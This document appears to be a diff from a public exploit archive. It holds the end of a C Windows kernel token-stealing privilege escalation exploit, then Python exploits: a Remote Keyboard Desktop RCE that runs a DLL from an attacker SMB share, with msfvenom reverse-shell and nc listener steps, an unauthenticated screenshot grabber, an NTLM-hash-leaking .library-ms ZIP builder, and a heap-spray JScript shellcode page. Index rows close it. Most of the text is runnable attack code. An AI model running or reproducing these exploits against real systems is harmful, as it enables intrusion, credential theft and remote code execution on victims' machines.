ULONG64 eprocess = p;
printf("Current EPROCESS = %llx\n", eprocess);
p = Read64(p + 0x2f0);
do {
p = Read64(p + 0x08);
ULONG64 pid = Read64(p - 0x08);
if (pid == 4) {
ULONG64 pSystemToken = Read64(p + 0x68);
printf("pSys/tem Token = %llx \n", pSystemToken);
HWND_class = (PULONGLONG)((PBYTE)0x303000);
HWND_class[8] = eprocess + 0x290;
HWND_class[12] = 0x100;
HWND_class[20] = 0x303010;
ULONG64 ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 +
0x98 - 0xa0, (LONG_PTR)HWND_class);
SetClassLongPtr(HWND_list[max + 1], 0x28, pSystemToken);
ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 -
0xa0, (LONG_PTR)ret_add);
break;
}
} while (p != eprocess);
syytem();
}
void buildmem()
{
WORD max_handle = 0;
pvShellCode = (PSHELLCODE)VirtualAlloc((PVOID)0x300000, 0x10000,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pvShellCode == NULL)
{
return;
}
ZeroMemory(pvShellCode, 0x10000);
ptagWNDFake = (PULONGLONG)((PBYTE)0x304140);
ptagWNDFake[0] = (ULONGLONG)0x304140;
ptagWNDFake[2] = (ULONGLONG)0x304140 + 0x10;
ptagWNDFake[6] = (ULONGLONG)0x304140;
ptagWNDFake[8] = 0x305300;
ptagWNDFake[11] = (ULONGLONG)MENU_add;
ptagWNDFake[68] = (ULONGLONG)0x304140 + 0x230;
ptagWNDFake[69] = (ULONGLONG)0x304140 + 0x28;
ptagWNDFake[70] = (ULONGLONG)0x304140 + 0x30;
ptagWNDFake[71] = (ULONGLONG)0x000004;
ptagWNDFake1 = (PULONGLONG)((PBYTE)0x305300);
ptagWNDFake1[1] = (ULONGLONG)0x11;
ptagWNDFake1[2] = (ULONGLONG)0x305320;
ptagWNDFake1[6] = (ULONGLONG)0x1000000000020000;
ptagWNDFake1[8] = (ULONGLONG)0x00000000029d0000;
ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120;
ptagWNDFake1[14] = (ULONGLONG)0x306500;
ptagWNDFake1[16] = (ULONGLONG)305400;
ptagWNDFake2 = (PULONGLONG)((PBYTE)0x306500);
ptagWNDFake1[11] = (ULONGLONG)0x306600;
WNDCLASSEX WndClass = { 0 };
WndClass.cbSize = sizeof(WNDCLASSEX);
WndClass.lpfnWndProc = DefWindowProc;
WndClass.style = CS_VREDRAW | CS_HREDRAW;
WndClass.cbWndExtra = 0xe0;
WndClass.hInstance = NULL;
WndClass.lpszMenuName = NULL;
WndClass.lpszClassName = L"NormalClass";
RegisterClassEx(&WndClass);
for (int i = 0; i < 0x200; i++)
{
HMENUL_list[i] = CreateMenu();
}
for (int i = 0; i < 0x100; i++)
{
HWND_list[i] = CreateWindowEx(NULL, L"NormalClass", NULL,
WS_VISIBLE, 0, 0, 0, 0, NULL, HMENUL_list[i], NULL, NULL);
}
for (int i = 0; i < 0x100; i++)
{
SetWindowLongPtr(HWND_list[i], 0x58, (LONG_PTR)0x0002080000000000);
SetWindowLongPtr(HWND_list[i], 0x80, (LONG_PTR)0x0000303030000000);
}
for (int i = 0x20; i < 0x60; i++)
{
if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2],
0x01)- (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 - 1],
0x01)== 0x250)
{
if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 +
1], 0x01)-(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01)
== 0x250)
{
HWND_add =
(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i*2], 0x01);
max = i * 2;
break;
}
}
if (i == 0x5f)
{
HWND_add = 0;
}
}
ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120;
DestroyWindow(HWND_list[max]);
createclass();
// Create a fake spmenu
PVOID hHeap = (PVOID)0x302000;
g_pFakeMenu = (tagMENU*)(PVOID)0x302000;
g_pFakeMenu->ref = (PVOID)0x302300;
*(PULONG64)g_pFakeMenu->ref = (ULONG64)g_pFakeMenu;
// cItems = 1
g_pFakeMenu->obj28 = (PVOID)0x302200;
*(PULONG64)((PBYTE)g_pFakeMenu->obj28 + 0x2C) = 1;
// rgItems
g_pFakeMenu->rgItems = (PVOID)0x304000;
// cx / cy must > 0
g_pFakeMenu->flag1 = 1;
g_pFakeMenu->flag2 = 1;
g_pFakeMenu->cxMenu = 1;
g_pFakeMenu->cyMenu = 1;
//
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR
lpCmdLine, int nCmdShow)
{
ULONGLONG gsValue = 0;
unsigned char shellcode[] =
"\x65\x48\x8B\x04\x25\x30\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc3";
LPVOID executableMemory = VirtualAlloc(NULL, sizeof(shellcode),
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (executableMemory == NULL) {
return 1;
}
memcpy(executableMemory, shellcode, sizeof(shellcode));
gsValue = ((ULONGLONG(*)())executableMemory)();
gsValue = gsValue + 0x800;
GS_hanlde = (PULONGLONG)(PBYTE)gsValue;
GS_off = GS_hanlde[5];
char str[0xb8] = "";
memset(str, 0x41, 0xa8);
g_NtUserEnableMenuItem =
(NtUserEnableMenuItem)GetProcAddress(GetModuleHandleA("win32u.dll"),
"NtUserEnableMenuItem");
g_NtUserSetClassLongPtr =
(NtUserSetClassLongPtr)GetProcAddress(GetModuleHandleA("win32u.dll"),
"NtUserSetClassLongPtr");
g_NtUserCreateAcceleratorTable =
(NtUserCreateAcceleratorTable)GetProcAddress(GetModuleHandleA("win32u.dll"),
"NtUserCreateAcceleratorTable");
g_pfnNtUserConsoleControl =
(fnNtUserConsoleControl)GetProcAddress(GetModuleHandleA("win32u.dll"),
"NtUserConsoleControl");
WNDCLASS wc = { 0 };
wc.lpfnWndProc = WndProc;
wc.hInstance = hInstance;
wc.lpszClassName = TEXT("EnableMenuItem");
RegisterClass(&wc);
HWND hWnd = CreateWindow(
wc.lpszClassName,
TEXT("EnableMenuItem"),
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,
CW_USEDEFAULT,
400, 300,
NULL,
NULL,
hInstance,
NULL
);
if (!hWnd) return FALSE;
///
hSystemMenu = GetSystemMenu(hWnd, FALSE);
hSubMenu = CreatePopupMenu();
MENU_add = GetMenuHandle(hSubMenu);
hMenuB = CreateMenu();
buildmem();
if (HWND_add == 0)
{
return 0;
}
AppendMenu(hSubMenu, MF_STRING, 0x2061, TEXT("0"));
AppendMenu(hSubMenu, MF_STRING, 0xf060, TEXT("1"));
DeleteMenu(hSystemMenu, SC_CLOSE, MF_BYCOMMAND);
AppendMenu(hMenuB, MF_POPUP, (UINT_PTR)hSubMenu, L"Menu A");
AppendMenu(hSystemMenu, MF_POPUP, (UINT_PTR)hMenuB, L"Menu B");
ShowWindow(hWnd, nCmdShow);
UpdateWindow(hWnd);
flag = 1;
g_NtUserEnableMenuItem(hSystemMenu, 0xf060, 0x01);
exploit();
MSG msg = { 0 };
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return (int)msg.wParam;
}
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM
lParam)
{
switch (message)
{
case WM_DESTROY:
PostQuitMessage(0);
return 0;
case 0xae:
switch (wParam)
{
case 0x1000:
if (flag)
{
int itemCount = GetMenuItemCount(hMenuB);
for (int i = itemCount - 1; i >= 0; i--) {
RemoveMenu(hMenuB, i, MF_BYPOSITION);
}
DestroyMenu(hSubMenu);
xxReallocPopupMenu();
}
case 0x1001:
if (flag)
{
int itemCount = GetMenuItemCount(hMenuB);
for (int i = itemCount - 1; i >= 0; i--) {
RemoveMenu(hMenuB, i, MF_BYPOSITION);
}
DestroyMenu(hSubMenu);
xxReallocPopupMenu();
}
return 0;
}
break;
}
return DefWindowProc(hWnd, message, wParam, lParam);
}
int syytem()
{
SECURITY_ATTRIBUTES sa;
HANDLE hRead, hWrite;
byte buf[40960] = { 0 };
STARTUPINFOW si;
PROCESS_INFORMATION pi;
DWORD bytesRead;
RtlSecureZeroMemory(&si, sizeof(si));
RtlSecureZeroMemory(&pi, sizeof(pi));
RtlSecureZeroMemory(&sa, sizeof(sa));
int br = 0;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hRead, &hWrite, &sa, 0))
{
return -3;
}
si.cb = sizeof(STARTUPINFO);
GetStartupInfoW(&si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.lpDesktop = L"WinSta0\\Default";
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
wchar_t cmd[4096] = { L"cmd.exe" };
if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si,
&pi))
{
CloseHandle(hWrite);
CloseHandle(hRead);
printf("[!] CreateProcessW Failed![%lx]\n", GetLastError());
return -2;
}
CloseHandle(hWrite);
}

132
exploits/windows/remote/52299.py Executable file
View file

@ -0,0 +1,132 @@
# Exploit Title: Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)
# Date: 05/17/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://remotecontrolio.web.app/
# Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare
# Version: 1.0.1
# Tested on: Windows 10 Pro Build 19045
# Start Remote Keyboard Desktop on your windows
# Preparing:
#
# 1. Generating payload (dll/exe):
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.105 LPORT=8080 -f dll > shell.dll
# 2. Start smb server: impacket-smbserver SHARE . -smb2support
# 3. nc -lnvp 8080
# 4. python exploit.py
#####
#!/usr/bin/env python3
import websocket
import json
import time
target = "192.168.8.105"
lhost = "192.168.8.101"
WS_URL = f"ws://{target}:8080/"
payload = "shell2.dll" # payload dll/exe filename
debug = False
HEADER_LIST = [
"User-Agent: Dart/3.7 (dart:io)",
f"Origin: http://{target}:8080",
"Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits"
]
#SMB_PATH = f"cmd /c \\\\{lhost}\\SHARE\\{payload}" # exe based
SMB_PATH = f"rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc" # dll
based
special_mapping = {
' ': ("SPACE", False),
'/': ("NUMPAD_DIVIDE", False),
'\\': ("\\", False),
'.': ("NUMPAD_DECIMAL", False),
',': (",", False),
}
def send_key_event(ws, key, key_down):
event = {"command": "keyboard_event", "data": {"key": key, "keyDown":
key_down, "capsLock": False}}
ws.send(json.dumps(event))
def send_text(ws, text, delay=0.05):
shift_pressed = False
for ch in text:
if ch in special_mapping:
key_name, need_shift = special_mapping[ch]
elif ch.isalpha():
need_shift = ch.isupper()
key_name = ch.upper()
elif ch.isdigit():
key_name = ch
need_shift = False
else:
raise ValueError(f"No key mapping for character: {ch!r}")
if need_shift and not shift_pressed:
send_key_event(ws, "SHIFT", True)
shift_pressed = True
elif not need_shift and shift_pressed:
send_key_event(ws, "SHIFT", False)
shift_pressed = False
send_key_event(ws, key_name, True)
send_key_event(ws, key_name, False)
time.sleep(delay)
if shift_pressed:
send_key_event(ws, "SHIFT", False)
def send_key(ws, keys, delay=0.05):
for key in keys:
send_key_event(ws, key, True)
time.sleep(delay)
for key in reversed(keys):
send_key_event(ws, key, False)
def on_open(ws):
print ("Let's start!")
send_key(ws, ["LEFT_WINDOWS", "R"])
time.sleep(0.5)
send_text(ws, SMB_PATH)
send_key(ws, ["RETURN"])
print ("Executing...")
time.sleep(1.2)
print("Check your listener!")
if debug:
print("\033[42;37mExploit by blue0x1 - github.com/blue0x1\033[0m
")
ws.close()
def on_message(ws, message):
if debug:
print("[=] Received:", message)
def on_error(ws, error):
if debug:
print("[!] Error:", error)
def on_close(ws, code, reason):
if debug:
print(f"[x] Closed: {code} - {reason}")
if __name__ == "__main__":
websocket.enableTrace(debug)
ws = websocket.WebSocketApp(
WS_URL,
header=HEADER_LIST,
on_open=on_open,
on_message=on_message,
on_error=on_error,
on_close=on_close
)
ws.run_forever()

61
exploits/windows/remote/52300.py Executable file
View file

@ -0,0 +1,61 @@
# Exploit Title: Windows 2024.15 - Unauthenticated Desktop Screenshot Capture
# Date: 2025-05-19
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)
'''
Description:
- Exploits the getScreenshot API endpoint in Remote for Windows helper
service
- Works when "Allow unknown devices" setting is enabled (default: disabled)
- Captures current desktop including login screens (SYSTEM-level access)
Vulnerable Component:
- /api/getScreenshot endpoint with missing authentication checks
# Identification:
nmap -p- -T4 <TARGET_IP> --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
'''
#!/usr/bin/env python3
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def capture_screenshot(ip, port, output_file):
try:
response = requests.get(
f"https://{ip}:{port}/api/getScreenshot",
headers={
"X-ClientToken": "exploit",
"X-HostName": "attacker-pc",
"X-HostFullModel": "exploit-device"
},
verify=False,
timeout=15
)
if response.status_code == 200 and
response.content.startswith(b'\xff\xd8'):
with open(output_file, 'wb') as f:
f.write(response.content)
print(f"[+] Saved: {output_file}")
return True
print(f"[-] Failed: HTTP {response.status_code}")
return False
except Exception as e:
print(f"[-] Error: {str(e)}")
return False
if __name__ == "__main__":
if len(sys.argv) < 4:
print(f"Usage: {sys.argv[0]} <IP> <PORT> <output.jpg>")
sys.exit(1)
sys.exit(0 if capture_screenshot(sys.argv[1], sys.argv[2], sys.argv[3])
else 1)

85
exploits/windows/remote/52310.py Executable file
View file

@ -0,0 +1,85 @@
#!/usr/bin/env python3
# Exploit Title: Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure
# Exploit Author: Mohammed Idrees Banyamer
# Twitter/GitHub:https://github.com/mbanyamer
# Date: 2025-05-27
# CVE: CVE-2025-24071
# Vendor: Microsoft
# Affected Versions: Windows 10/11 (All supporting .library-ms and SMB)
# Tested on: Windows 11 (23H2)
# Type: Local / Remote (NTLM Leak)
# Platform: Windows
# Vulnerability Type: Information Disclosure
# Description:
# Windows Explorer automatically initiates an SMB authentication request when a
# .library-ms file is extracted from a ZIP archive. This causes NTLM credentials
# (in hashed format) to be leaked to a remote SMB server controlled by the attacker.
# No user interaction is required beyond extraction.
import zipfile
from pathlib import Path
import argparse
import re
import sys
from colorama import Fore, Style
def create_library_ms(ip: str, filename: str, output_dir: Path) -> Path:
"""Creates a malicious .library-ms file pointing to an attacker's SMB server."""
payload = f'''<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\\\{ip}\\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>'''
output_file = output_dir / f"{filename}.library-ms"
output_file.write_text(payload, encoding="utf-8")
return output_file
def build_zip(library_file: Path, output_zip: Path):
"""Packages the .library-ms file into a ZIP archive."""
with zipfile.ZipFile(output_zip, 'w', zipfile.ZIP_DEFLATED) as archive:
archive.write(library_file, arcname=library_file.name)
print(f"{Fore.GREEN}[+] Created ZIP: {output_zip}{Style.RESET_ALL}")
def is_valid_ip(ip: str) -> bool:
return re.match(r"^\d{1,3}(\.\d{1,3}){3}$", ip) is not None
def main():
parser = argparse.ArgumentParser(
description="CVE-2025-24071 - NTLM Hash Disclosure via .library-ms ZIP Archive",
epilog="example:\n python3 CVE-2025-24071_tool.py -i 192.168.1.100 -n payload1 -o ./output_folder --keep",
formatter_class=argparse.RawTextHelpFormatter
)
parser.add_argument("-i", "--ip", required=True, help="Attacker SMB IP address (e.g., 192.168.1.100)")
parser.add_argument("-n", "--name", default="malicious", help="Base filename (default: malicious)")
parser.add_argument("-o", "--output", default="output", help="Output directory (default: ./output)")
parser.add_argument("--keep", action="store_true", help="Keep .library-ms file after ZIP creation")
args = parser.parse_args()
if not is_valid_ip(args.ip):
print(f"{Fore.RED}[!] Invalid IP address: {args.ip}{Style.RESET_ALL}")
sys.exit(1)
output_dir = Path(args.output)
output_dir.mkdir(parents=True, exist_ok=True)
print(f"{Fore.CYAN}[*] Generating malicious .library-ms file...{Style.RESET_ALL}")
library_file = create_library_ms(args.ip, args.name, output_dir)
zip_file = output_dir / f"{args.name}.zip"
build_zip(library_file, zip_file)
if not args.keep:
library_file.unlink()
print(f"{Fore.YELLOW}[-] Removed intermediate .library-ms file{Style.RESET_ALL}")
print(f"{Fore.MAGENTA}[!] Done. Send ZIP to victim and listen for NTLM hash on your SMB server.{Style.RESET_ALL}")
if __name__ == "__main__":
main()

108
exploits/windows/remote/52315.py Executable file
View file

@ -0,0 +1,108 @@
#!/usr/bin/env python3
# Exploit Title: Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)
# Exploit Author: Mohammed Idrees Banyamer
# Instagram: @@banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# CVE: CVE-2025-30397
# Vendor: Microsoft
# Affected Versions: Windows Server 2025 (build 25398 and prior)
# Tested on: Windows Server 2025 + IE11 (x86)
# Type: Remote
# Platform: Windows
# Vulnerability Type: Use-After-Free (JScript Engine)
# Description: This PoC exploits a Use-After-Free vulnerability in jscript.dll to achieve code execution via heap spraying. The shellcode executes calc.exe as a demonstration of code execution.
# ============================
# Usage Instructions:
#
# 1. Save this script as `exploit_server.py`.
# 2. Run it with Python 3:
# $ python3 exploit_server.py
# 3. On the vulnerable target (Windows Server 2025 + IE11):
# Open Internet Explorer and navigate to:
# http://<attacker-ip>:8080/poc_cve_2025_30397.html
#
# If the target is vulnerable, calc.exe will be executed.
# ============================
import http.server
import socketserver
PORT = 8080
HTML_CONTENT = b"""<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>PoC - CVE-2025-30397</title>
<script>
var payload = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
while (payload.length < 0x1000) payload += payload;
var shell = unescape(
"%u9090%u9090%uebfc%u5eeb%u31b8%u64c9%u8b8b%u3050%u8b0c%u8b70" +
"%u3c4a%u780c%u4f0a%u4b8b%u1c70%u8b1c%u8b6c%u0c5c%u8b14%u285c" +
"%uef01%u528b%u8b10%u3c0a%u758b%u1c28%u8b34%u5c6a%u0158%uc985" +
"%u75c9%u8b58%u8b10%u3c20%u418b%u0348%u408b%u8b34%u1c4a%uc085" +
"%u7401%u0343%u0c6a%u58eb%ue8d0%uff00%u6361%u6c63%u2e00%u6578" +
"%u0065"
);
var final = payload + shell;
var buffer = [];
for (var i = 0; i < 1500; i++) buffer[i] = final.substring(0);
var sprayTarget = document.createElement("iframe");
sprayTarget.setAttribute("src", "about:blank");
document.body.appendChild(sprayTarget);
for (var i = 0; i < 200; i++) {
try {
sprayTarget.contentWindow.eval("var a = '" + final + "'");
} catch (e) {}
}
for (var j = 0; j < 1000; j++) {
var obj = document.createElement("div");
obj.innerHTML = "EXPLOIT" + j;
document.body.appendChild(obj);
}
var victim = document.createElement("object");
victim.setAttribute("classid", "clsid:0002DF01-0000-0000-C000-000000000046");
document.body.appendChild(victim);
alert("PoC loaded. If vulnerable, calc.exe will launch.");
</script>
</head>
<body>
<h1 style="color:red;">Exploit PoC: CVE-2025-30397</h1>
<h2>Author: Mohammed Idrees Banyamer</h2>
<h3>Instagram: <a href="https://instagram.com/mbanyamer" target="_blank">@banyamer_security</a></h3>
<h3>GitHub: <a href="https://github.com/mbanyamer" target="_blank">mbanyamer</a></h3>
<p>This demonstration is for ethical testing only. Triggering the vulnerability on vulnerable Internet Explorer installations will lead to execution of calc.exe via shellcode.</p>
</body>
</html>
"""
class Handler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == '/' or self.path == '/poc_cve_2025_30397.html':
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-length", str(len(HTML_CONTENT)))
self.send_header("X-Content-Type-Options", "nosniff")
self.send_header("X-Frame-Options", "SAMEORIGIN")
self.send_header("Content-Security-Policy", "default-src 'self'")
self.send_header("Cache-Control", "no-cache, no-store, must-revalidate")
self.send_header("Pragma", "no-cache")
self.send_header("Expires", "0")
self.end_headers()
self.wfile.write(HTML_CONTENT)
else:
self.send_error(404, "File Not Found")
def run():
print(f"Serving PoC on http://0.0.0.0:{PORT}/poc_cve_2025_30397.html")
with socketserver.TCPServer(("", PORT), Handler) as httpd:
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("\nServer stopped.")
if __name__ == "__main__":
run()

27
files_exploits.csv
View file

@ -5550,6 +5550,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
33254,exploits/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 - 'simpleSearch.do' Cross-Site Scripting",2009-09-23,IBM,webapps,java,,2009-09-23,2014-05-09,1,CVE-2009-3469;OSVDB-58320,,,,,https://www.securityfocus.com/bid/36513/info
31438,exploits/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,webapps,java,,2008-03-19,2014-02-06,1,CVE-2007-4592;OSVDB-43356,,,,,https://www.securityfocus.com/bid/28296/info
36299,exploits/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",webapps,java,,2011-11-11,2015-03-06,1,,,,,,https://www.securityfocus.com/bid/50646/info
52304,exploits/java/webapps/52304.py,"Java-springboot-codebase 1.1 - Arbitrary File Read",2025-05-25,d3sca,webapps,java,,2025-05-25,2025-05-25,0,CVE-2025-46822,,,,,
36971,exploits/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Cross-Site Scripting",2012-03-18,sonyy,webapps,java,,2012-03-18,2015-05-09,1,,,,,,https://www.securityfocus.com/bid/52545/info
36828,exploits/java/webapps/36828.txt,"JaWiki - 'versionNo' Cross-Site Scripting",2012-02-17,sonyy,webapps,java,,2012-02-17,2015-04-27,1,,,,,,https://www.securityfocus.com/bid/52060/info
37033,exploits/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Cross-Site Scripting",2012-04-02,"Dawid Golak",webapps,java,,2012-04-02,2015-05-17,1,,,,,,https://www.securityfocus.com/bid/52845/info
@ -9267,6 +9268,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47708,exploits/macos/local/47708.txt,"macOS 10.14.6 - root->kernel Privilege Escalation via update_dyld_shared_cache",2019-11-22,"Google Security Research",local,macos,,2019-11-22,2019-11-22,1,,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1929
47400,exploits/macos/local/47400.md,"macOS 18.7.0 Kernel - Local Privilege Escalation",2019-09-19,A2nkF,local,macos,,2019-09-19,2019-09-19,0,,,,,,https://github.com/A2nkF/macOS-Kernel-Exploit/tree/81765a91cd299b6c05fd3edf7afe557405c949fa
48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,,2020-05-12,2020-05-12,0,,,,,,
52316,exploits/macos/local/52316.py,"macOS LaunchDaemon iOS 17.2 - Privilege Escalation",2025-06-05,"Mohammed Idrees Banyamer",local,macos,,2025-06-05,2025-06-05,0,CVE-2025-24085,,,,,
43217,exploits/macos/local/43217.sh,"Murus 1.4.11 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,0,,Local,,,http://www.exploit-db.commurus-1.4.11.zip,https://m4.rkw.io/blog/murus-firewall-1411-escalation-hihack--root-privesc.html
41854,exploits/macos/local/41854.txt,"Proxifier for Mac 2.17/2.18 - Privesc Escalation",2017-04-11,"Mark Wadham",local,macos,,2017-04-11,2017-04-12,0,CVE-2017-7643,Local,,,,https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html
41853,exploits/macos/local/41853.txt,"Proxifier for Mac 2.18 - Multiple Vulnerabilities",2017-04-11,Securify,local,macos,,2017-04-11,2017-04-11,0,,,,,,https://www.securify.nl/advisory/SFY20170401/multiple_local_privilege_escalation_vulnerabilities_in_proxifier_for_mac.html
@ -10425,6 +10427,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52191,exploits/multiple/hardware/52191.py,"ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass",2025-04-14,"tasos meletlidis",hardware,multiple,,2025-04-14,2025-04-14,0,,,,,,
11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,,
51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,,
52306,exploits/multiple/local/52306.txt,"ABB Cylon Aspect Studio 3.08.03 - Binary Planting",2025-05-25,LiquidWorm,local,multiple,,2025-05-25,2025-05-25,0,CVE-2024-13946,,,,,
38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,,
30666,exploits/multiple/local/30666.txt,"ACE Stream Media 2.1 - 'acestream://' Format String",2014-01-03,LiquidWorm,local,multiple,,2014-01-07,2014-01-07,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php
19139,exploits/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",local,multiple,,2012-06-14,2012-06-14,0,OSVDB-81754;CVE-2012-0780,,,,,
@ -10568,6 +10571,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51983,exploits/multiple/local/51983.txt,"PrusaSlicer 2.6.1 - Arbitrary code execution",2024-04-12,"Kamil Breński",local,multiple,,2024-04-12,2024-04-12,0,,,,,,
43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2016-0772,,,,,https://github.com/tintinweb/pub/tree/11f6ebda59ad878377df78351f8ab580660d0024/pocs/cve-2016-0772
52190,exploits/multiple/local/52190.py,"qBittorrent 5.0.1 - MITM RCE",2025-04-11,"Jordan Sharp",local,multiple,,2025-04-11,2025-04-11,0,CVE-2024-51774,,,,,
52289,exploits/multiple/local/52289.txt,"RDPGuard 9.9.9 - Privilege Escalation",2025-05-13,"Ahmet Ümit BAYRAM",local,multiple,,2025-05-13,2025-05-13,0,CVE-n/a,,,,,
21078,exploits/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 - Weak Password Encryption",2001-08-23,"Desmond Irvine",local,multiple,,2001-08-23,2012-09-05,1,CVE-2001-1003;OSVDB-11802,,,,,https://www.securityfocus.com/bid/3228/info
47172,exploits/multiple/local/47172.sh,"S-nail < 14.8.16 - Local Privilege Escalation",2019-01-13,bcoles,local,multiple,,2019-07-26,2019-07-26,0,CVE-2017-5899,,,,,https://github.com/bcoles/local-exploits/blob/3c5cd80a7c59ccd29a2c2a1cdbf71e0de8e66c11/CVE-2017-5899/exploit.sh
49108,exploits/multiple/local/49108.txt,"SAP Lumira 1.31 - Stored Cross-Site Scripting",2020-11-27,"Ilca Lucian Florin",local,multiple,,2020-11-27,2020-11-27,0,,,,,,
@ -10585,6 +10589,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
22732,exploits/multiple/local/22732.java,"Sun JRE/SDK 1.x - Untrusted Applet Java Security Model Violation",2003-06-05,"Marc Schoenefeld",local,multiple,,2003-06-05,2012-11-15,1,CVE-2003-1123;OSVDB-15151,,,,,https://www.securityfocus.com/bid/7824/info
9973,exploits/multiple/local/9973.sh,"Sun VirtualBox 3.0.6 - Local Privilege Escalation",2009-10-17,prdelka,local,multiple,,2009-10-16,,1,CVE-2009-3692,,,,,
49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple,,2020-12-09,2020-12-09,0,,,,,,
52292,exploits/multiple/local/52292.c,"TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow",2025-05-13,"Mohamed Maatallah",local,multiple,,2025-05-13,2025-05-13,0,CVE-2024-11237,,,,,
19551,exploits/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)",1997-02-13,"Last Stage of Delirium",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info
